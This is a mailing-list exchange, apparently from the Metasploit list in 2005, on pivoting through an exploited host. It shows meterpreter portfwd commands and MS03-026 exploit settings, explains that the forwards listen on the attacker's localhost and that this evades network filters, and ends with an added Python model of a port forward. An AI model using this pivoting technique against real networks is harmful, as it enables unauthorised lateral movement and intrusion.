Metasploit mailing list archives

use of meterpreter


From: mmiller at hick.org (mmiller at hick.org)
Date: Thu, 14 Apr 2005 02:34:57 -0500

On Thu, Apr 14, 2005 at 09:10:12AM +0200, Thomas Werth wrote:
> 1. Exploited "proxy victim" with metasploit's meterpreter payload.
> 2. In meterpreter "shell" I'm adding some portfwds like this:
> - portfwd -a -l 9500 -h 'nextTargetIP' -p 135
> - portfwd -a -l 4444 -h 'nextTargetIP' -p 4444 -P //-P is just another
> test in the hope it will work this time ...
> 3. now I'm using msrpc exploit with win32_bind payload
> Setting Options to
>
> msf msrpc_dcom_ms03_026(win32_bind) > show options
>
> Exploit and Payload Options
> ===========================
>
>   Exploit:    Name      Default        Description
>   --------    ------    -----------    ------------------
>   required    RHOST     'ProxyHost'    The target address
>   required    RPORT     9500           The target port
>
>   Payload:    Name        Default    Description
>   --------    --------    -------    ------------------------------------------
>   required    EXITFUNC    thread     Exit technique: "process", "thread", "seh"
>   required    LPORT       4444       Listening port for bind shell
>
>   Target: Windows NT SP6/2K/XP/2K3 ALL
>
> 4. now launching exploit
>
> msf msrpc_dcom_ms03_026(win32_bind) > exploit
>
> 5. that's where it hangs:
>
> [*] Starting Bind Handler.
> [*] Got connection from 'HOST_I_USE_FOR_ATTACK':32773 <-> 'PROXY_HOST':4444
>
> 6. Waited long enough, killed connection with Ctrl-C
>
> Caught interrupt, exit connection? [y/n] y
> [*] Exiting Bind Handler.
>
> What am I doing wrong, or isn't it possible to use portfwd so attacks
> can be redirected through a proxy?

The thing to note is that connections are proxied from your local
machine through the meterpreter connection to the target that you are
trying to reach.  In the example you provided above, it appears that you
are expecting the port forwards to be listening on the proxy host that
you initially exploited.  Instead, you should expect the port forward
listeners to be listening on your local machine.  All of the steps you
performed were correct, except instead of using 'ProxyHost' you should
use 127.0.0.1 for RHOST.  I imagine the reason the bind handler got a
connection is because you exploited the 'ProxyHost' with win32_bind
(using port 4444).

The reason connections are proxied starting from your local machine is
because this allows you to transparently bypass any sort of inbound or
outbound filters (since it tunnels through the already established
meterpreter communication channel).

Hope that helps!
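As an added illustration of the answer above (written for this page, not code from the thread or from Metasploit), a Python model of a meterpreter port forward: the listener binds on the operator's own 127.0.0.1, and the second exploit reaches 'nextTargetIP' by connecting to that local port with RHOST=127.0.0.1. The hop to the next host is a plain TCP connect standing in for the meterpreter channel, and the service on 'nextTargetIP' is a constructed echo stub.

```python
import socket
import threading

LOCAL_BIND = "127.0.0.1"  # portfwd listeners live on the operator's own host, not on the proxy host

def _pipe(src, dst):
    """Copy one direction until src sends EOF, then pass that EOF on to dst."""
    while chunk := src.recv(4096):
        dst.sendall(chunk)
    dst.shutdown(socket.SHUT_WR)

class PortForward:
    """Model of `portfwd -a -l LPORT -h RHOST -p RPORT`. Assumption (model only): the hop
    to (rhost, rport) is a plain TCP connect; meterpreter carries it inside the channel
    it already has open, which is why the forward passes filters on the proxy host."""
    def __init__(self, lport, rhost, rport):
        self.remote = (rhost, rport)
        self.listener = socket.socket()
        self.listener.bind((LOCAL_BIND, lport))  # lport=0 lets the OS pick a free port
        self.listener.listen(5)
        threading.Thread(target=self._serve, daemon=True).start()

    def lport(self):
        return self.listener.getsockname()[1]

    def _serve(self):
        while True:
            client, _ = self.listener.accept()
            upstream = socket.create_connection(self.remote)
            threading.Thread(target=_pipe, args=(client, upstream), daemon=True).start()
            threading.Thread(target=_pipe, args=(upstream, client), daemon=True).start()

def start_next_target():
    """Constructed stand-in for the service on 'nextTargetIP': answers one request, then closes."""
    srv = socket.socket()
    srv.bind((LOCAL_BIND, 0))
    srv.listen(1)
    def serve():
        conn, _ = srv.accept()
        with conn:
            conn.sendall(b"nextTarget got: " + conn.recv(1024))
    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]

def reach_via_forward(lport, request=b"hello"):
    """The second stage uses RHOST=127.0.0.1: it talks to the local listener, not to 'ProxyHost'."""
    with socket.create_connection((LOCAL_BIND, lport)) as s:
        s.sendall(request)
        s.shutdown(socket.SHUT_WR)
        return s.recv(1024)
```

Pointing the second exploit at 'ProxyHost':9500 instead finds nothing listening there, which is the failure the thread describes.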


